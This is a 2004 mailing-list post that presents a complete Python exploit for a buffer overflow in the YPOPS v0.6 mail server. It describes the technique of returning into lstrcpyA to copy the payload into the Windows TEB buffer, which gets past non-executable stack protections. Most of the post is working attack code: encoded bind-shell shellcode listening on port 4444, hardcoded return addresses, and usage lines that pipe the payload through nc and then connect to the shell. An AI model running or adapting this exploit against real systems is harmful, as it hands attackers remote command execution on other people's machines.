Vulnerability Development mailing list archives
TEB buffer+Return Into LIBC based string copy exploitation
From: varun uppal <varunuppal () linuxmail org>
Date: 10 Nov 2004 11:38:14 -0000
Hi,

I have put together some info on using the TEB (Thread Execution Block) Buffer and libc for exploiting NON-EXEC STACK Win32 environments. I haven't come across any major public exploit using this method nor much information on the same. The Shellcoder's Handbook was of great help though. Thought it would be useful for someone interested in the same.

EXPLOIT:

#!/usr/bin/env python
"""
Exploit for an old BoF in YPOPS v0.6 discovered by Behrang Fouldai.

Coded as a PoC for defeating non-exec stacks and stack protections like
Overflow Guard etc.

This exploit utilizes the 520 byte buffer in the TEB (i.e. is used for ANSI
to Unicode string operations). The EIP is overwritten with the address of
lstrcpyA accompanied by the return address, the source and destination
buffer addresses. On successful EIP overwrite the lstrcpyA copies the
attacker supplied payload to the address in the TEB, following which the
execution proceeds from there (since it is the return addr that we supplied).

Came across this useful concept in "The Shellcoder's Handbook".

Can be used for
  1) Bypassing stack protections.
  2) When none of the regs (ecx, ebx, eax, esp etc) point to our payload.

BUFFER LAYOUT

| payload | addr of lstrcpyA | addr of buff in TEB | addr of buff in TEB | addr of our payload |
            ret addr for       destination for       Addr of our
            execution          Payload               Payload

Tested on Win2K Adv Server with no patches and Overflow Guard.
This is heavily dependent on the addresses which must be modified according
to the versions.

0x77E87E39 --> Address of lstrcpyA from kernel32.dll
0x7ffDE1BC --> Address in TEB buffer to which payload will be copied and
               execution commences
0x00E6FAB8 --> Address of Payload on stack

Shellcode from Sergio Alvarez's paper on win32 exploitation (gr8 paper).

Coded by Varun Uppal (varunuppal () linuxmail org)

greetz to JhaanGi, swatkat_razor, saTurn444 and metasploit crew. gr8 work

USAGE:
  python pop_exp2.py | nc "addr of target host" "target port"
  Telnet "addr of target host" 4444 for cmd prompt
"""

import struct

# Shellcode (from Sergio Alvarez's paper), binds a cmd prompt on port 4444
exp = "\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\xe0\x66"
exp += "\x1c\xc2\x83\xeb\xfc\xe2\xf4\x1c\x8e\x4a\xc2\xe0\x66\x4f\x97\xb6"
exp += "\x31\x97\xae\xc4\x7e\x97\x87\xdc\xed\x48\xc7\x98\x67\xf6\x49\xaa"
exp += "\x7e\x97\x98\xc0\x67\xf7\x21\xd2\x2f\x97\xf6\x6b\x67\xf2\xf3\x1f"
exp += "\x9a\x2d\x02\x4c\x5e\xfc\xb6\xe7\xa7\xd3\xcf\xe1\xa1\xf7\x30\xdb"
exp += "\x1a\x38\xd6\x95\x87\x97\x98\xc4\x67\xf7\xa4\x6b\x6a\x57\x49\xba"
exp += "\x7a\x1d\x29\x6b\x62\x97\xc3\x08\x8d\x1e\xf3\x20\x39\x42\x9f\xbb"
exp += "\xa4\x14\xc2\xbe\x0c\x2c\x9b\x84\xed\x05\x49\xbb\x6a\x97\x99\xfc"
exp += "\xed\x07\x49\xbb\x6e\x4f\xaa\x6e\x28\x12\x2e\x1f\xb0\x95\x05\x61"
exp += "\x8a\x1c\xc3\xe0\x66\x4b\x94\xb3\xef\xf9\x2a\xc7\x66\x1c\xc2\x70"
exp += "\x67\x1c\xc2\x56\x7f\x04\x25\x44\x7f\x6c\x2b\x05\x2f\x9a\x8b\x44"
exp += "\x7c\x6c\x05\x44\xcb\x32\x2b\x39\x6f\xe9\x6f\x2b\x8b\xe0\xf9\xb7"
exp += "\x35\x2e\x9d\xd3\x54\x1c\x99\x6d\x2d\x3c\x93\x1f\xb1\x95\x1d\x69"
exp += "\xa5\x91\xb7\xf4\x0c\x1b\x9b\xb1\x35\xe3\xf6\x6f\x99\x49\xc6\xb9"
exp += "\xef\x18\x4c\x02\x94\x37\xe5\xb4\x99\x2b\x3d\xb5\x56\x2d\x02\xb0"
exp += "\x36\x4c\x92\xa0\x36\x5c\x92\x1f\x33\x30\x4b\x27\x57\xc7\x91\xb3"
exp += "\x0e\x1e\xc2\xf1\x3a\x95\x22\x8a\x76\x4c\x95\x1f\x33\x38\x91\xb7"
exp += "\x99\x49\xea\xb3\x32\x4b\x3d\xb5\x46\x95\x05\x88\x25\x51\x86\xe0"
exp += "\xef\xff\x45\x1a\x57\xdc\x4f\x9c\x42\xb0\xa8\xf5\x3f\xef\x69\x67"
exp += "\x9c\x9f\x2e\xb4\xa0\x58\xe6\xf0\x22\x7a\x05\xa4\x42\x20\xc3\xe1"
exp += "\xef\x60\xe6\xa8\xef\x60\xe6\xac\xef\x60\xe6\xb0\xeb\x58\xe6\xf0"
exp += "\x32\x4c\x93\xb1\x37\x5d\x93\xa9\x37\x4d\x91\xb1\x99\x69\xc2\x88"
exp += "\x14\xe2\x71\xf6\x99\x49\xc6\x1f\xb6\x95\x24\x1f\x13\x1c\xaa\x4d"
exp += "\xbf\x19\x0c\x1f\x33\x18\x4b\x23\x0c\xe3\x3d\xd6\x99\xcf\x3d\x95"
exp += "\x66\x74\x32\x6a\x62\x43\x3d\xb5\x62\x2d\x19\xb3\x99\xcc\xc2"

# Buffer layout as described above: payload, then the four addresses
print '\x90'*10 + exp + '\x90'*96 \
    + struct.pack('<L', 0x77e87e39) \
    + struct.pack('<L', 0x7ffde1bc) \
    + struct.pack('<L', 0x7ffde1bc) \
    + '\xb8' + '\xfa' + '\xe6' + '\x00'